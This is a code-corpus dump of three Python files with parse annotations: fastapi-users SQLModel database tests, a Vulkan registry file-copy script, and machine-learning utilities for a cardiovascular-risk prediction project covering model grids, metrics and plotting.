fastapi-users/fastapi-users-db-sqlmodel | tests/test_users.py | 3a46b80399f129aa07a834a1b40bf49d08c37be1 | import uuid
from typing import AsyncGenerator
import pytest
from sqlalchemy import exc
from sqlalchemy.ext.asyncio import AsyncSession, create_async_engine
from sqlalchemy.orm import sessionmaker
from sqlmodel import Session, SQLModel, create_engine
from fastapi_users_db_sqlmodel import (
NotSetOAuthAccountTableError,
SQLModelUserDatabase,
SQLModelUserDatabaseAsync,
)
from tests.conftest import OAuthAccount, UserDB, UserDBOAuth
safe_uuid = uuid.UUID("a9089e5d-2642-406d-a7c0-cbc641aca0ec")
async def init_sync_session(url: str) -> AsyncGenerator[Session, None]:
engine = create_engine(url, connect_args={"check_same_thread": False})
SQLModel.metadata.create_all(engine)
with Session(engine) as session:
yield session
SQLModel.metadata.drop_all(engine)
async def init_async_session(url: str) -> AsyncGenerator[AsyncSession, None]:
engine = create_async_engine(url, connect_args={"check_same_thread": False})
make_session = sessionmaker(engine, class_=AsyncSession, expire_on_commit=False)
async with engine.begin() as conn:
await conn.run_sync(SQLModel.metadata.create_all)
async with make_session() as session:
yield session
await conn.run_sync(SQLModel.metadata.drop_all)
@pytest.fixture(
params=[
(init_sync_session, "sqlite:///./test-sqlmodel-user.db", SQLModelUserDatabase),
(
init_async_session,
"sqlite+aiosqlite:///./test-sqlmodel-user.db",
SQLModelUserDatabaseAsync,
),
],
ids=["sync", "async"],
)
async def sqlmodel_user_db(request) -> AsyncGenerator[SQLModelUserDatabase, None]:
create_session = request.param[0]
database_url = request.param[1]
database_class = request.param[2]
async for session in create_session(database_url):
yield database_class(UserDB, session)
@pytest.fixture(
params=[
(
init_sync_session,
"sqlite:///./test-sqlmodel-user-oauth.db",
SQLModelUserDatabase,
),
(
init_async_session,
"sqlite+aiosqlite:///./test-sqlmodel-user-oauth.db",
SQLModelUserDatabaseAsync,
),
],
ids=["sync", "async"],
)
async def sqlmodel_user_db_oauth(request) -> AsyncGenerator[SQLModelUserDatabase, None]:
create_session = request.param[0]
database_url = request.param[1]
database_class = request.param[2]
async for session in create_session(database_url):
yield database_class(UserDBOAuth, session, OAuthAccount)
@pytest.mark.asyncio
@pytest.mark.db
async def test_queries(sqlmodel_user_db: SQLModelUserDatabase[UserDB, OAuthAccount]):
user = UserDB(
id=safe_uuid,
email="[email protected]",
hashed_password="guinevere",
)
# Create
user_db = await sqlmodel_user_db.create(user)
assert user_db.id is not None
assert user_db.is_active is True
assert user_db.is_superuser is False
assert user_db.email == user.email
# Update
user_db.is_superuser = True
await sqlmodel_user_db.update(user_db)
# Get by id
id_user = await sqlmodel_user_db.get(user.id)
assert id_user is not None
assert id_user.id == user_db.id
assert id_user.is_superuser is True
# Get by email
email_user = await sqlmodel_user_db.get_by_email(str(user.email))
assert email_user is not None
assert email_user.id == user_db.id
# Get by uppercased email
email_user = await sqlmodel_user_db.get_by_email("[email protected]")
assert email_user is not None
assert email_user.id == user_db.id
# Unknown user
unknown_user = await sqlmodel_user_db.get_by_email("[email protected]")
assert unknown_user is None
# Delete user
await sqlmodel_user_db.delete(user)
deleted_user = await sqlmodel_user_db.get(user.id)
assert deleted_user is None
# Exception when trying to get by OAuth account
with pytest.raises(NotSetOAuthAccountTableError):
await sqlmodel_user_db.get_by_oauth_account("foo", "bar")
@pytest.mark.asyncio
@pytest.mark.db
async def test_insert_existing_email(
sqlmodel_user_db: SQLModelUserDatabase[UserDB, OAuthAccount]
):
user = UserDB(
id=safe_uuid,
email="[email protected]",
hashed_password="guinevere",
)
await sqlmodel_user_db.create(user)
with pytest.raises(exc.IntegrityError):
await sqlmodel_user_db.create(
UserDB(id=safe_uuid, email=user.email, hashed_password="guinevere")
)
@pytest.mark.asyncio
@pytest.mark.db
async def test_insert_non_nullable_fields(
sqlmodel_user_db: SQLModelUserDatabase[UserDB, OAuthAccount]
):
with pytest.raises(exc.IntegrityError):
wrong_user = UserDB(
id=safe_uuid, email="[email protected]", hashed_password="aaa"
)
wrong_user.email = None # type: ignore
await sqlmodel_user_db.create(wrong_user)
@pytest.mark.asyncio
@pytest.mark.db
async def test_queries_custom_fields(
sqlmodel_user_db: SQLModelUserDatabase[UserDB, OAuthAccount],
):
"""It should output custom fields in query result."""
user = UserDB(
id=safe_uuid,
email="[email protected]",
hashed_password="guinevere",
first_name="Lancelot",
)
await sqlmodel_user_db.create(user)
id_user = await sqlmodel_user_db.get(user.id)
assert id_user is not None
assert id_user.id == user.id
assert id_user.first_name == user.first_name
@pytest.mark.asyncio
@pytest.mark.db
async def test_queries_oauth(
sqlmodel_user_db_oauth: SQLModelUserDatabase[UserDBOAuth, OAuthAccount],
oauth_account1,
oauth_account2,
):
user = UserDBOAuth(
id=safe_uuid,
email="[email protected]",
hashed_password="guinevere",
oauth_accounts=[oauth_account1, oauth_account2],
)
# Create
user_db = await sqlmodel_user_db_oauth.create(user)
assert user_db.id is not None
assert hasattr(user_db, "oauth_accounts")
assert len(user_db.oauth_accounts) == 2
# Update
user_db.oauth_accounts[0].access_token = "NEW_TOKEN"
await sqlmodel_user_db_oauth.update(user_db)
# Get by id
id_user = await sqlmodel_user_db_oauth.get(user.id)
assert id_user is not None
assert id_user.id == user_db.id
assert id_user.oauth_accounts[0].access_token == "NEW_TOKEN"
# Get by email
email_user = await sqlmodel_user_db_oauth.get_by_email(str(user.email))
assert email_user is not None
assert email_user.id == user_db.id
assert len(email_user.oauth_accounts) == 2
# Get by OAuth account
oauth_user = await sqlmodel_user_db_oauth.get_by_oauth_account(
oauth_account1.oauth_name, oauth_account1.account_id
)
assert oauth_user is not None
assert oauth_user.id == user.id
assert len(oauth_user.oauth_accounts) == 2
# Unknown OAuth account
unknown_oauth_user = await sqlmodel_user_db_oauth.get_by_oauth_account("foo", "bar")
assert unknown_oauth_user is None
| [((17, 12, 17, 61), 'uuid.UUID', 'uuid.UUID', ({(17, 22, 17, 60): '"""a9089e5d-2642-406d-a7c0-cbc641aca0ec"""'}, {}), "('a9089e5d-2642-406d-a7c0-cbc641aca0ec')", False, 'import uuid\n'), ((38, 1, 48, 1), 'pytest.fixture', 'pytest.fixture', (), '', False, 'import pytest\n'), ((57, 1, 71, 1), 'pytest.fixture', 'pytest.fixture', (), '', False, 'import pytest\n'), ((21, 13, 21, 74), 'sqlmodel.create_engine', 'create_engine', (), '', False, 'from sqlmodel import Session, SQLModel, create_engine\n'), ((22, 4, 22, 40), 'sqlmodel.SQLModel.metadata.create_all', 'SQLModel.metadata.create_all', ({(22, 33, 22, 39): 'engine'}, {}), '(engine)', False, 'from sqlmodel import Session, SQLModel, create_engine\n'), ((25, 4, 25, 38), 'sqlmodel.SQLModel.metadata.drop_all', 'SQLModel.metadata.drop_all', ({(25, 31, 25, 37): 'engine'}, {}), '(engine)', False, 'from sqlmodel import Session, SQLModel, create_engine\n'), ((29, 13, 29, 80), 'sqlalchemy.ext.asyncio.create_async_engine', 'create_async_engine', (), '', False, 'from sqlalchemy.ext.asyncio import AsyncSession, create_async_engine\n'), ((30, 19, 30, 84), 'sqlalchemy.orm.sessionmaker', 'sessionmaker', (), '', False, 'from sqlalchemy.orm import sessionmaker\n'), ((83, 11, 87, 5), 'tests.conftest.UserDB', 'UserDB', (), '', False, 'from tests.conftest import OAuthAccount, UserDB, UserDBOAuth\n'), ((135, 11, 139, 5), 'tests.conftest.UserDB', 'UserDB', (), '', False, 'from tests.conftest import OAuthAccount, UserDB, UserDBOAuth\n'), ((167, 11, 172, 5), 'tests.conftest.UserDB', 'UserDB', (), '', False, 'from tests.conftest import OAuthAccount, UserDB, UserDBOAuth\n'), ((188, 11, 193, 5), 'tests.conftest.UserDBOAuth', 'UserDBOAuth', (), '', False, 'from tests.conftest import OAuthAccount, UserDB, UserDBOAuth\n'), ((23, 9, 23, 24), 'sqlmodel.Session', 'Session', ({(23, 17, 23, 23): 'engine'}, {}), '(engine)', False, 'from sqlmodel import Session, SQLModel, create_engine\n'), ((126, 9, 126, 52), 'pytest.raises', 'pytest.raises', ({(126, 23, 126, 51): 'NotSetOAuthAccountTableError'}, {}), '(NotSetOAuthAccountTableError)', False, 'import pytest\n'), ((142, 9, 142, 42), 'pytest.raises', 'pytest.raises', ({(142, 23, 142, 41): 'exc.IntegrityError'}, {}), '(exc.IntegrityError)', False, 'import pytest\n'), ((153, 9, 153, 42), 'pytest.raises', 'pytest.raises', ({(153, 23, 153, 41): 'exc.IntegrityError'}, {}), '(exc.IntegrityError)', False, 'import pytest\n'), ((154, 21, 156, 9), 'tests.conftest.UserDB', 'UserDB', (), '', False, 'from tests.conftest import OAuthAccount, UserDB, UserDBOAuth\n'), ((144, 12, 144, 79), 'tests.conftest.UserDB', 'UserDB', (), '', False, 'from tests.conftest import OAuthAccount, UserDB, UserDBOAuth\n')] |
rtbo/vkdgen | copy_reg.py | 04a228961bb091b59dc6f741eee703cd81724ca3 | #! /usr/bin/env python3
import os
from os import path
root_dir = path.dirname(path.realpath(__file__))
local_reg_dir = path.join(root_dir, 'registry')
os.makedirs(local_reg_dir, exist_ok=True)
def copy_reg(reg_dir, files):
import shutil
for f in files:
file_path = path.join(reg_dir, f)
if not path.isfile(file_path):
raise RuntimeError(file_path + ' could not be found')
shutil.copy2(file_path, path.join(local_reg_dir, path.basename(f)))
vk_files = [ 'registry/vk.xml', 'registry/reg.py', 'registry/generator.py' ]
copy_reg(path.join(root_dir, 'Vulkan-Headers'), vk_files)
| [((7, 16, 7, 47), 'os.path.join', 'path.join', ({(7, 26, 7, 34): 'root_dir', (7, 36, 7, 46): '"""registry"""'}, {}), "(root_dir, 'registry')", False, 'from os import path\n'), ((8, 0, 8, 41), 'os.makedirs', 'os.makedirs', (), '', False, 'import os\n'), ((6, 24, 6, 47), 'os.path.realpath', 'path.realpath', ({(6, 38, 6, 46): '__file__'}, {}), '(__file__)', False, 'from os import path\n'), ((19, 9, 19, 46), 'os.path.join', 'path.join', ({(19, 19, 19, 27): 'root_dir', (19, 29, 19, 45): '"""Vulkan-Headers"""'}, {}), "(root_dir, 'Vulkan-Headers')", False, 'from os import path\n'), ((13, 20, 13, 41), 'os.path.join', 'path.join', ({(13, 30, 13, 37): 'reg_dir', (13, 39, 13, 40): 'f'}, {}), '(reg_dir, f)', False, 'from os import path\n'), ((14, 15, 14, 37), 'os.path.isfile', 'path.isfile', ({(14, 27, 14, 36): 'file_path'}, {}), '(file_path)', False, 'from os import path\n'), ((16, 57, 16, 73), 'os.path.basename', 'path.basename', ({(16, 71, 16, 72): 'f'}, {}), '(f)', False, 'from os import path\n')] |
atward424/ASCVD_ML | utils.py | 39404dd5f50a527576b91e8f53f5157f76382712 | import numpy as np
import pandas as pd
import scipy.stats as st
#from medical_ML import Experiment
import matplotlib.pyplot as plt
import xgboost as xgb
from sklearn.ensemble import RandomForestClassifier, GradientBoostingClassifier
from sklearn.dummy import DummyClassifier
from sklearn.tree import DecisionTreeClassifier
from sklearn.linear_model import LogisticRegression, Lasso
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import SVC
from sklearn import linear_model
from sklearn.ensemble import RandomForestRegressor, GradientBoostingRegressor
from sklearn.dummy import DummyRegressor
def split_cohort(datafile, to_exclude = None, test_ind_col = None, drop = 'some'):
""" Load and clean the dataset
"""
if isinstance(datafile, str):
data = pd.read_csv(datafile)
else:
data = datafile
test_data = None
if to_exclude is not None:
for k in to_exclude.keys():
if k == 'race':
data = data[data[k].isin(to_exclude[k])]
elif k == 'agebl':
data = data[data[k] >= to_exclude[k]]
elif to_exclude[k]:
data = data[data[k] == 0]
if drop == 'some':
data = data.drop(k, axis = 1)
if drop == 'all':
if (k != 'race') & (k != 'agebl'):
data = data.drop(k, axis = 1)
# self.data = self.data[self.data['year'] <= 2010]
# self.data = self.data.drop(['year'], axis = 1)
if test_ind_col is not None:
test_data = data[data[test_ind_col] == 1]
test_data = test_data.drop(test_ind_col, axis = 1)
data = data[data[test_ind_col] == 0]
data = data.drop(test_ind_col, axis = 1)
return(data, test_data)
def calc_auc_conf_interval(AUC, N1, N2, ci = 0.95):
# from https://ncss-wpengine.netdna-ssl.com/wp-content/themes/ncss/pdf/Procedures/PASS/Confidence_Intervals_for_the_Area_Under_an_ROC_Curve.pdf
zsc = st.norm.ppf(1 - (1-ci)/2.)
q1 = AUC / (2 - AUC)
q2 = (2 * AUC * AUC) / (1 + AUC)
numerator = AUC * (1 - AUC) + (N1 - 1) * (q1 - AUC * AUC) + (N2 - 1) * (q2 - AUC * AUC)
denom = N1 * N2
se_AUC = np.sqrt(numerator / denom)
return (se_AUC, AUC - zsc * se_AUC, AUC, AUC + zsc * se_AUC)
def load_models_and_parameters_default():
models_and_parameters = {
'dummy_reg': (DummyRegressor(),
{"strategy": ["mean"]}),
'lasso_reg': (linear_model.Lasso(),
{'alpha': np.arange(0.1, 1.0, 0.01),
'max_iter': [10000]}),
'rf_reg': (RandomForestRegressor(),
{'n_estimators': [501],
'criterion': ['mae'],
'max_depth': [3, 5, 10],
'max_features': ['auto', 'sqrt', 'log2']}),
'gbm_reg': (GradientBoostingRegressor(),
{'n_estimators': [501],
'criterion': ['mae'],
# 'loss': ['ls', 'lad'],
'max_depth': [3, 5, 10],
'max_features': ['auto', 'sqrt', 'log2']}),
'dummy': (DummyClassifier(),
{"strategy": ["most_frequent"]}),
# 'logreg': (LogisticRegression(),
# {"class_weight": [None],
# "C":[0.1, 0.3, 1,5, 10]}), #, "balanced"
# 'logreg': (LogisticRegression(),
# {"class_weight": [None],
# "C":[0.01,0.1, 1]}), #, "balanced"
# "C":[0.1]}), #, "balanced"
'logreg': (LogisticRegression(),
{}), #, "balanced"
# "C":[0.1]}), #, "balanced"
'lasso': (Lasso(),
{"alpha": [0.0001, 0.001],#np.arange(0.01, 1.01, 0.05),
'max_iter': [10000]}),
# 'lasso2': (LogisticRegression(penalty = 'l1'),
# {"C":[0.001, 0.01,0.1, 1]}),
'lasso2': (LogisticRegression(penalty = 'l1',solver ='saga'),
{}),
'elnet': (LogisticRegression(penalty = 'elasticnet', solver = 'saga'),
{"C":[0.001, 0.01,0.1, 1],
"l1_ratio":[0.01, 0.1, 0.5, 0.9, 0.99]}),
'dt': (DecisionTreeClassifier(),
{"criterion": ["entropy"],
# "max_depth": [2, 3, 4, 5, 10, 20], # None
"max_depth": [1, 2, 3, 4], # None
"splitter": ["best", "random"],
"min_samples_split": [2, 5, 10],
"min_samples_leaf": [3, 5, 10, 15, 20],
"random_state": [817263]}),
'svm': (SVC(),
{'C': [ 1],
'kernel': ['linear']}), #'poly', 'rbf'
'knn': (KNeighborsClassifier(),
{'n_neighbors': [2, 3, 5, 10, 20, 50],
'weights': ['uniform', 'distance']}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [501],
# 'max_depth': [3, 5, 10],
# 'max_features': ['auto', 'sqrt', 'log2']}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [50, 100, 501, 1000],
# 'max_depth': [3,5,7],
# "min_samples_split": [2, 5],
# 'max_features': ['auto', 0.5],
# "class_weight": [None, "balanced"]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [501],
# 'max_depth': [5],
# "min_samples_split": [5],
# 'max_features': ['auto'],
# "class_weight": [None]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [ 501, 1000, 2000, 4000],
# 'max_depth': [5, 7, 9, 11, 13],
# "min_samples_split": [2],
# 'max_features': ['sqrt', 0.25, 0.5, 0.75, 1.0],
# "class_weight": [None]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [200, 500, 1000],
# 'max_depth': [4, 6, 8, 10],
# "min_samples_split": [2, 10],
# 'max_features': [0.25, 0.5],
# "class_weight": [None]}),
'rf': (RandomForestClassifier(),
{'n_estimators': [800],
'max_depth': [8],
"min_samples_split": [10],
'max_features': [0.25],
"class_weight": [None]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [400, 500, 600],
# 'max_depth': [7,8,9],
# "min_samples_split": [5,10],
# 'max_features': [0.25, 0.5, ]}),
# 'rf': (RandomForestClassifier(),
# {}),
'xgb': (xgb.XGBClassifier(),
{}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [600],
# 'max_depth': [9],
# "min_samples_split": [10],
# 'max_features': [0.25]}),
#
# 'xgb': (xgb.XGBClassifier(),
# {'n_estimators': [100,500],
# 'max_depth': [3,4,5],
# 'learning_rate': [0.1, 0.3],
# "reg_alpha": [0, 1],
# "reg_lambda": [0.1, 1]}),
# 'xgb': (xgb.XGBClassifier(),
# {'n_estimators': [500],
# 'max_depth': [4],
# 'learning_rate': [0.1],
# "reg_alpha": [0, 10],
# "reg_lambda": [0.1, 10]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [200, 300],
# 'learning_rate': [0.01],
# 'max_depth': [3,4,5],
# 'subsample': [0.35, 0.7],
# 'max_features': [0.25]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [400],
# 'learning_rate': [0.01],
# 'max_depth': [5],
# 'subsample': [0.75],
# 'max_features': [0.25]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [300, 400, 500],
# 'learning_rate': [0.01, 0.003, 0.4],
# 'max_depth': [5, 6, 7],
# 'subsample': [0.85, 1],
# 'max_features': [0.25, 0.5]}),
'gbm': (GradientBoostingClassifier(),
{}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [100, 200, 300, 500, 1000, 2000,
# 4000],
# 'max_depth': [2, 3, 4, 5, 6, 7,
# 9],
# 'subsample': [0.75,
# 1],
# 'max_features': ['sqrt', 'log2', 0.25, 0.5, 0.75,
# 1.0]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [100, 200, 400, 800],
# 'learning_rate': [0.03, 0.01, 0.001],
# 'max_depth': [4,5,6,8],
# 'subsample': [0.85],
# 'max_features': [0.25, 0.5]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [400, 600],
# 'learning_rate': [0.01],
# 'max_depth': [5, 6],
# 'subsample': [0.85],
# 'max_features': [0.25]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [25, 50, 75, 100, 200],
# 'max_depth': [2,3,5],
# 'subsample': [0.25, 0.5, 0.75, 1],
# 'max_features': [None, 'sqrt', 'log2', 0.5]}),
}
return(models_and_parameters)
def load_models_and_parameters():
models_and_parameters = {
'dummy_reg': (DummyRegressor(),
{"strategy": ["mean"]}),
'lasso_reg': (linear_model.Lasso(),
{'alpha': np.arange(0.1, 1.0, 0.01),
'max_iter': [10000]}),
'rf_reg': (RandomForestRegressor(),
{'n_estimators': [501],
'criterion': ['mae'],
'max_depth': [3, 5, 10],
'max_features': ['auto', 'sqrt', 'log2']}),
'gbm_reg': (GradientBoostingRegressor(),
{'n_estimators': [501],
'criterion': ['mae'],
# 'loss': ['ls', 'lad'],
'max_depth': [3, 5, 10],
'max_features': ['auto', 'sqrt', 'log2']}),
'dummy': (DummyClassifier(),
{"strategy": ["most_frequent"]}),
# 'logreg': (LogisticRegression(),
# {"class_weight": [None],
# "C":[0.1, 0.3, 1,5, 10]}), #, "balanced"
'logreg': (LogisticRegression(),
{"class_weight": [None],
"C":[0.01,0.1, 1]}), #, "balanced"
# "C":[0.1]}), #, "balanced"
# 'logreg': (LogisticRegression(),
# {}), #, "balanced"
# # "C":[0.1]}), #, "balanced"
'lasso': (Lasso(),
{"alpha": [0.0001, 0.001],#np.arange(0.01, 1.01, 0.05),
'max_iter': [10000]}),
'lasso2': (LogisticRegression(penalty = 'l1', solver ='saga'),
{"C":[0.001, 0.01,0.1, 1]}),
# 'lasso2': (LogisticRegression(penalty = 'l1'),
# {}),
'elnet': (LogisticRegression(penalty = 'elasticnet', solver = 'saga'),
{"C":[0.001, 0.01,0.1, 1],
"l1_ratio":[0.01, 0.1, 0.5, 0.9, 0.99]}),
'dt': (DecisionTreeClassifier(),
{"criterion": ["entropy"],
# "max_depth": [2, 3, 4, 5, 10, 20], # None
"max_depth": [1, 2, 3, 4], # None
"splitter": ["best", "random"],
"min_samples_split": [2, 5, 10],
"min_samples_leaf": [3, 5, 10, 15, 20],
"random_state": [817263]}),
'svm': (SVC(),
{'C': [ 1],
'kernel': ['linear']}), #'poly', 'rbf'
'knn': (KNeighborsClassifier(),
{'n_neighbors': [2, 3, 5, 10, 20, 50],
'weights': ['uniform', 'distance']}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [501],
# 'max_depth': [3, 5, 10],
# 'max_features': ['auto', 'sqrt', 'log2']}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [50, 100, 501, 1000],
# 'max_depth': [3,5,7],
# "min_samples_split": [2, 5],
# 'max_features': ['auto', 0.5],
# "class_weight": [None, "balanced"]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [501],
# 'max_depth': [5],
# "min_samples_split": [5],
# 'max_features': ['auto'],
# "class_weight": [None]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [ 501, 1000, 2000, 4000],
# 'max_depth': [5, 7, 9, 11, 13],
# "min_samples_split": [2],
# 'max_features': ['sqrt', 0.25, 0.5, 0.75, 1.0],
# "class_weight": [None]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [200, 500, 1000],
# 'max_depth': [4, 6, 8, 10],
# "min_samples_split": [2, 10],
# 'max_features': [0.25, 0.5],
# "class_weight": [None]}),
'rf': (RandomForestClassifier(),
{'n_estimators': [500, 1000],
'max_depth': [8],
"min_samples_split": [10],
'max_features': [0.25],
"class_weight": [None]}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [400, 500, 600],
# 'max_depth': [7,8,9],
# "min_samples_split": [5,10],
# 'max_features': [0.25, 0.5, ]}),
# 'rf': (RandomForestClassifier(),
# {}),
# 'xgb': (xgb.XGBClassifier(),
# {}),
# 'rf': (RandomForestClassifier(),
# {'n_estimators': [600],
# 'max_depth': [9],
# "min_samples_split": [10],
# 'max_features': [0.25]}),
#
# 'xgb': (xgb.XGBClassifier(),
# {'n_estimators': [100,500],
# 'max_depth': [3,4,5],
# 'learning_rate': [0.1, 0.3],
# "reg_alpha": [0, 1],
# "reg_lambda": [0.1, 1]}),
# 'xgb': (xgb.XGBClassifier(),
# {'n_estimators': [500],
# 'max_depth': [4],
# 'learning_rate': [0.1],
# "reg_alpha": [0, 10],
# "reg_lambda": [0.1, 10]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [200, 300],
# 'learning_rate': [0.01],
# 'max_depth': [3,4,5],
# 'subsample': [0.35, 0.7],
# 'max_features': [0.25]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [400],
# 'learning_rate': [0.01],
# 'max_depth': [5],
# 'subsample': [0.75],
# 'max_features': [0.25]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [300, 400, 500],
# 'learning_rate': [0.01, 0.003, 0.4],
# 'max_depth': [5, 6, 7],
# 'subsample': [0.85, 1],
# 'max_features': [0.25, 0.5]}),
# 'gbm': (GradientBoostingClassifier(),
# {}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [100, 200, 300, 500, 1000, 2000,
# 4000],
# 'max_depth': [2, 3, 4, 5, 6, 7,
# 9],
# 'subsample': [0.75,
# 1],
# 'max_features': ['sqrt', 'log2', 0.25, 0.5, 0.75,
# 1.0]}),
'gbm': (GradientBoostingClassifier(),
{'n_estimators': [100, 200, 400, 800],
'learning_rate': [0.03, 0.01, 0.001],
'max_depth': [4,5,6,8],
'subsample': [0.85],
'max_features': [0.25, 0.5]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [400, 600],
# 'learning_rate': [0.01],
# 'max_depth': [5, 6],
# 'subsample': [0.85],
# 'max_features': [0.25]}),
# 'gbm': (GradientBoostingClassifier(),
# {'n_estimators': [25, 50, 75, 100, 200],
# 'max_depth': [2,3,5],
# 'subsample': [0.25, 0.5, 0.75, 1],
# 'max_features': [None, 'sqrt', 'log2', 0.5]}),
}
return(models_and_parameters)
def calc_metrics(y_true, y_pred, return_all = False):
res_df = pd.DataFrame({'y_true' : y_true,
'y_pred': y_pred}, columns = ['y_pred', 'y_true'])
res_df = res_df.sort_values(by = 'y_pred')
res_df['TN'] = (res_df.y_true == 0).cumsum()
res_df['FN'] = (res_df.y_true == 1).cumsum()
if return_all == False:
res_df = pd.concat([pd.DataFrame({'y_true' : -1,
'y_pred': -1,
"TN": 0,
"FN":0},
index = [-1],
columns = ['y_pred', 'y_true', 'TN', "FN"]),
res_df], axis = 0)
res_df['TP'] = (res_df.y_true == 1).sum() - res_df['FN']
res_df['FP'] = (res_df.y_true == 0).sum() - res_df['TN']
res_df['sens'] = res_df.TP / (res_df.TP + res_df.FN)
res_df['spec'] = res_df.TN / (res_df.TN + res_df.FP)
res_df['PPV'] = res_df.TP / (res_df.TP + res_df.FP)
res_df['accuracy'] = (res_df.TP + res_df.TN) / (res_df.shape[0])
res_df['f1_score'] = 2 * res_df.PPV * res_df.sens / (res_df.PPV + res_df.sens)
res_df['youdens_index'] = res_df.sens + res_df.spec - 1
# remove predictions which represent non-separable decision points (i.e., y_pred is equal)
if return_all == False:
res_df = res_df[(res_df.y_pred.duplicated('last') == False)]
return(res_df)
def set_up_plot():
# plt.grid(True, 'major', color = 'w', linewidth = 0.7)
plt.grid(True, 'major', color = '0.85', linewidth = 0.7)
plt.grid(True, 'minor', color = "0.92", linestyle = '-', linewidth = 0.7)
ax = plt.gca()
plt.xlim([-0.05, 1.05])
plt.ylim([-0.05, 1.05])
ax.set_axisbelow(True)
# ax.patch.set_facecolor("0.85")
def train_val(RESULT_DIR, alldata, models, label = 'Label',
cv = 5,
score_name = "AUC",
to_exclude = None,
test_ind_col = None, oversample_rate = 1,
imputer = 'iterative', add_missing_flags = True):
from medical_ML import Experiment
print('\n\n' + 'STARTING EXPERIMENT FOR ' + RESULT_DIR + '\n\n')
expt = Experiment(alldata, label = label,
to_exclude = to_exclude,
test_ind_col = test_ind_col, drop = 'all',
result_dir = RESULT_DIR)
expt.predict_models_from_groups(0, models, cv=cv, score_name=score_name, mode='classification',
oversample_rate = oversample_rate,
imputer = imputer, add_missing_flags = add_missing_flags)
expt.save_and_plot_results(models,
cv = cv, test = False)
return(expt) | [((55, 10, 55, 36), 'scipy.stats.norm.ppf', 'st.norm.ppf', ({(55, 22, 55, 35): '1 - (1 - ci) / 2.0'}, {}), '(1 - (1 - ci) / 2.0)', True, 'import scipy.stats as st\n'), ((60, 13, 60, 39), 'numpy.sqrt', 'np.sqrt', ({(60, 21, 60, 38): 'numerator / denom'}, {}), '(numerator / denom)', True, 'import numpy as np\n'), ((409, 13, 410, 70), 'pandas.DataFrame', 'pd.DataFrame', (), '', True, 'import pandas as pd\n'), ((438, 4, 438, 60), 'matplotlib.pyplot.grid', 'plt.grid', (), '', True, 'import matplotlib.pyplot as plt\n'), ((439, 4, 439, 77), 'matplotlib.pyplot.grid', 'plt.grid', (), '', True, 'import matplotlib.pyplot as plt\n'), ((440, 9, 440, 18), 'matplotlib.pyplot.gca', 'plt.gca', ({}, {}), '()', True, 'import matplotlib.pyplot as plt\n'), ((441, 4, 441, 27), 'matplotlib.pyplot.xlim', 'plt.xlim', ({(441, 13, 441, 26): '[-0.05, 1.05]'}, {}), '([-0.05, 1.05])', True, 'import matplotlib.pyplot as plt\n'), ((442, 4, 442, 27), 'matplotlib.pyplot.ylim', 'plt.ylim', ({(442, 13, 442, 26): '[-0.05, 1.05]'}, {}), '([-0.05, 1.05])', True, 'import matplotlib.pyplot as plt\n'), ((455, 11, 458, 46), 'medical_ML.Experiment', 'Experiment', (), '', False, 'from medical_ML import Experiment\n'), ((23, 15, 23, 36), 'pandas.read_csv', 'pd.read_csv', ({(23, 27, 23, 35): 'datafile'}, {}), '(datafile)', True, 'import pandas as pd\n'), ((66, 30, 66, 46), 'sklearn.dummy.DummyRegressor', 'DummyRegressor', ({}, {}), '()', False, 'from sklearn.dummy import DummyRegressor\n'), ((68, 30, 68, 50), 'sklearn.linear_model.Lasso', 'linear_model.Lasso', ({}, {}), '()', False, 'from sklearn import linear_model\n'), ((71, 27, 71, 50), 'sklearn.ensemble.RandomForestRegressor', 'RandomForestRegressor', ({}, {}), '()', False, 'from sklearn.ensemble import RandomForestRegressor, GradientBoostingRegressor\n'), ((76, 28, 76, 55), 'sklearn.ensemble.GradientBoostingRegressor', 'GradientBoostingRegressor', ({}, {}), '()', False, 'from sklearn.ensemble import RandomForestRegressor, GradientBoostingRegressor\n'), ((82, 26, 82, 43), 'sklearn.dummy.DummyClassifier', 'DummyClassifier', ({}, {}), '()', False, 'from sklearn.dummy import DummyClassifier\n'), ((91, 27, 91, 47), 'sklearn.linear_model.LogisticRegression', 'LogisticRegression', ({}, {}), '()', False, 'from sklearn.linear_model import LogisticRegression, Lasso\n'), ((95, 26, 95, 33), 'sklearn.linear_model.Lasso', 'Lasso', ({}, {}), '()', False, 'from sklearn.linear_model import LogisticRegression, Lasso\n'), ((101, 27, 101, 76), 'sklearn.linear_model.LogisticRegression', 'LogisticRegression', (), '', False, 'from sklearn.linear_model import LogisticRegression, Lasso\n'), ((104, 26, 104, 85), 'sklearn.linear_model.LogisticRegression', 'LogisticRegression', (), '', False, 'from sklearn.linear_model import LogisticRegression, Lasso\n'), ((107, 23, 107, 47), 'sklearn.tree.DecisionTreeClassifier', 'DecisionTreeClassifier', ({}, {}), '()', False, 'from sklearn.tree import DecisionTreeClassifier\n'), ((115, 24, 115, 29), 'sklearn.svm.SVC', 'SVC', ({}, {}), '()', False, 'from sklearn.svm import SVC\n'), ((118, 24, 118, 46), 'sklearn.neighbors.KNeighborsClassifier', 'KNeighborsClassifier', ({}, {}), '()', False, 'from sklearn.neighbors import 